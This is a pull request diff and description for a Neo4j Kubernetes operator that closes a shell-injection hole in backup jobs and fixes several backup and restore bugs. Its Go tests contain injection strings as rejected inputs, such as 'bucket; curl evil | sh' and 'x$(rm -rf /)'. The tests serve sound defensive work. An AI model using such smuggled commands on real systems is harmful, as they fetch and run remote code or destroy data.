+// storageShellSafe is the allowlist for storage/bucket/path/tempPath segments
+// that end up inside the backup Job's shell command. Intentionally
+// conservative: covers S3/GCS bucket grammar, Azure storage-account/container
+// (incl. the account/container '/' form) and POSIX paths, while excluding
+// every shell metacharacter.
+var storageShellSafe = regexp.MustCompile(`^[A-Za-z0-9._/\-]+$`)
 
 // validateStorageType validates storage type for Neo4j 5.26+ features
 func (v *BackupValidator) validateStorageType(storageType string) error {

--- a/internal/validation/backup_validator_test.go
+++ b/internal/validation/backup_validator_test.go
@@ -639,3 +639,70 @@ func TestBackupValidator_CloudAtSpecLevel(t *testing.T) {
 		t.Error("expected an error for S3 backup with no cloud provider anywhere")
 	}
 }
+
+// TestBackupValidator_ShellSafetyCharsets pins #219: fields that reach the
+// backup Job's /bin/sh -c command are rejected up front when they carry shell
+// metacharacters (the command builder also quotes them — defense-in-depth).
+func TestBackupValidator_ShellSafetyCharsets(t *testing.T) {
+	validator := NewBackupValidator()
+	base := func() *neo4jv1beta1.Neo4jBackup {
+		return &neo4jv1beta1.Neo4jBackup{
+			ObjectMeta: metav1.ObjectMeta{Name: "b", Namespace: "ns"},
+			Spec: neo4jv1beta1.Neo4jBackupSpec{
+				Target:  neo4jv1beta1.BackupTarget{Kind: "Cluster", Name: "c"},
+				Storage: neo4jv1beta1.StorageLocation{Type: "s3", Bucket: "my-bucket", Path: "backups/prod"},
+				Cloud:   &neo4jv1beta1.CloudBlock{Provider: "aws"},
+			},
+		}
+	}
+
+	t.Run("clean spec passes", func(t *testing.T) {
+		if errs := validator.Validate(base()); len(errs) != 0 {
+			t.Fatalf("expected no errors, got %v", errs)
+		}
+	})
+
+	t.Run("bucket with metacharacters rejected", func(t *testing.T) {
+		b := base()
+		b.Spec.Storage.Bucket = "bucket; curl evil | sh"
+		if errs := validator.Validate(b); len(errs) == 0 {
+			t.Fatal("expected bucket charset rejection")
+		}
+	})
+
+	t.Run("path with command substitution rejected", func(t *testing.T) {
+		b := base()
+		b.Spec.Storage.Path = "x$(rm -rf /)"
+		if errs := validator.Validate(b); len(errs) == 0 {
+			t.Fatal("expected path charset rejection")
+		}
+	})
+
+	t.Run("tempPath must be absolute and clean", func(t *testing.T) {
+		b := base()
+		b.Spec.Options = &neo4jv1beta1.BackupOptions{TempPath: "/tmp/ok-dir_1"}
+		if errs := validator.Validate(b); len(errs) != 0 {
+			t.Fatalf("clean absolute tempPath must pass, got %v", errs)
+		}
+		b.Spec.Options.TempPath = "relative/path"
+		if errs := validator.Validate(b); len(errs) == 0 {
+			t.Fatal("relative tempPath must be rejected")
+		}
+		b.Spec.Options.TempPath = "/tmp/x;evil"
+		if errs := validator.Validate(b); len(errs) == 0 {
+			t.Fatal("metacharacter tempPath must be rejected")
+		}
+	})
+
+	t.Run("chainFromBackup must be a resource name", func(t *testing.T) {
+		b := base()
+		b.Spec.ChainFromBackup = "daily-full"
+		if errs := validator.Validate(b); len(errs) != 0 {
+			t.Fatalf("valid chainFromBackup must pass, got %v", errs)
+		}
+		b.Spec.ChainFromBackup = "x; touch /tmp/pwned"
+		if errs := validator.Validate(b); len(errs) == 0 {
+			t.Fatal("metacharacter chainFromBackup must be rejected")
+		}
+	})
+}

--- a/internal/validation/backup_validator_test.go
+++ b/internal/validation/backup_validator_test.go
@@ -21,6 +21,7 @@ import (
 	"testing"
 
 	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+	"k8s.io/utils/ptr"
 
 	neo4jv1beta1 "github.com/neo4j-partners/neo4j-kubernetes-operator/api/v1beta1"
 )
@@ -291,7 +292,7 @@ func TestBackupValidator_Validate(t *testing.T) {
 						},
 					},
 					Options: &neo4jv1beta1.BackupOptions{
-						Compress: true,
+						Compress: ptr.To(true),
 						Verify:   true,
 					},
 				},


### PR DESCRIPTION
First of the progressive PRs burning down the backup/restore audit (#217, #218, #219, #220, #221, #222). Wave 1 = the HIGH-severity data-loss, security and broken-core-path items, each with pinning tests.

## Backup (#217, #219)

- **Job-condition terminal detection**: `job.Status.Failed > 0` counts failed pod ATTEMPTS (BackoffLimit=3) — a transient pod failure permanently marked one-shot backups Failed and recorded eventually-successful scheduled runs as Failed in history (never corrected due to RunID dedup → `ResolveBackupRef` skipped them → `backupRef` restores/seeds broke). Both paths now use `jobConditionTrue(JobComplete/JobFailed)` like the restore controller.
- **`spec.suspend` actually suspends**: propagates to `CronJob.spec.suspend` (K8s previously kept firing scheduled Jobs while the CR reported Suspended); resume asserts it back; removing `spec.schedule` deletes the now-orphaned CronJob (previously fired forever).
- **`Compress` → `*bool`** (rule-66 trap): bool+omitempty+default silently re-applied `true` on every spec round-trip — compression could never be disabled. `CompressEffective()` for callers.
- **Shell injection closed** (#219): `storage.bucket`/`storage.path`/`options.tempPath`/`chainFromBackup` reached `/bin/sh -c` unquoted in a pod holding cloud credentials. Now shell-quoted at assembly (to-path, temp-path, validate from-path, PVC mkdir prelude) AND charset-validated up front (phase=Invalid with a clear message).

## Restore (#218)

- **Cloud `backupRef` path defaulting**: write side defaults empty `storage.path` → `backups`; the read side didn't — every defaulted-path cloud backup resolved to the wrong URI and was unrestorable via backupRef. The default now lives in `ResolveBackupRef` (the canonical resolver, rule 55) via a shared constant.
- **stopCluster re-entry**: no longer overwrites `original-replicas` with the current (0) count — a Pending re-entry previously made `startCluster` 'restore' zero replicas, instance never came back. Post-stop hook/Job-create failures now run `restoreClusterAfterFailure` instead of stranding the instance at 0 with the in-progress annotation held. `checkDatabaseExists` skipped on re-entry against the instance this restore already stopped.
- **Force gate on cluster recreate**: the cluster Cypher path wiped an EXISTING database unconditionally; it now requires `force`/`replaceExisting` like the Job path, with an actionable error.
- **Hooks were entirely dead, now functional**: phase-string mismatch ("pre-restore" vs "pre") made Job hooks a silent no-op; Cypher hooks used the cluster `-client` service that doesn't exist on standalone (the only path hooks run on). Pre-hooks moved before stopCluster (live Bolt needed), post-hooks after database registration; hook Jobs get owner refs + condition-based waits.
- **Fresh-attempt retry semantics**: spec-bump retries previously short-circuited on the stale `cypher-restore-issued` annotation (insta-Complete/insta-Fail) and silently ignored a changed `backupRef` (old pinned snapshot always won). Both cleared/invalidated on a new generation.
- **Nil-Auth panic**: standalone targets without `spec.auth` crashed the reconciler; admin secret resolution now defaults.

## Verification

Full unit suite green; drift gate clean (CRD/bundle/helm regenerated for the Compress pointer). Live PVC + MinIO-S3 backup→restore verification on a fresh Kind cluster follows in this PR's review window; Waves 2 (robustness: transient-vs-terminal routing, chain CronJob coverage, retention rewrite, seed-proxy lifecycle) and 3 (dead API surface #220 + full docs sweep #221) come as follow-up PRs on this base.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **High Risk**
> Touches backup/restore reconciliation, cluster scale-down, shell command assembly with cloud credentials, and destructive cluster recreate gates—core data-protection paths with broad blast radius despite strong test coverage.
> 
> **Overview**
> Wave 1 of the backup/restore audit addresses **high-severity correctness, data-loss, and security** issues in the Neo4j backup and restore controllers.
> 
> **Backup (#217, #219):** Terminal Job status now uses **`JobComplete` / `JobFailed` conditions** instead of pod failure counts, so transient retries no longer permanently mark backups Failed or pollute history (breaking `backupRef`). **`spec.suspend`** propagates to the CronJob and resume clears it; removing **`spec.schedule`** deletes orphaned CronJobs. **`options.compress`** is a **`*bool`** with **`CompressEffective()`** so explicit `false` survives API round-trips. User-controlled path fields are **shell-quoted** in Job commands and **charset-validated** at admission; **`GetBackupCommand`** quotes `--to-path`.
> 
> **Restore (#218):** **`ResolveBackupRef`** defaults empty **`storage.path`** to **`backups`**, matching the backup write path so cloud **`backupRef`** restores hit the right URI. **`stopCluster`** no longer overwrites **`original-replicas`** on re-entry; failures after stop call **`restoreClusterAfterFailure`**. Cluster Cypher recreate requires **`force` / `replaceExisting`** for existing DBs. Restore **hooks** use aligned phase strings, standalone Bolt clients, pre-stop / post-register ordering, owner refs, and condition-based hook Job waits. Spec-bump retries **clear stale cypher-restore and pinned resolvedSource**; **`restoreAdminSecretName`** avoids nil-auth panics.
> 
> CRDs/bundle/helm regenerated for **`Compress`**; extensive unit tests added for lifecycle, resolver, and validation.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit 413b33dc6d5d035839455d5a51c43cb043a3ce7b. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->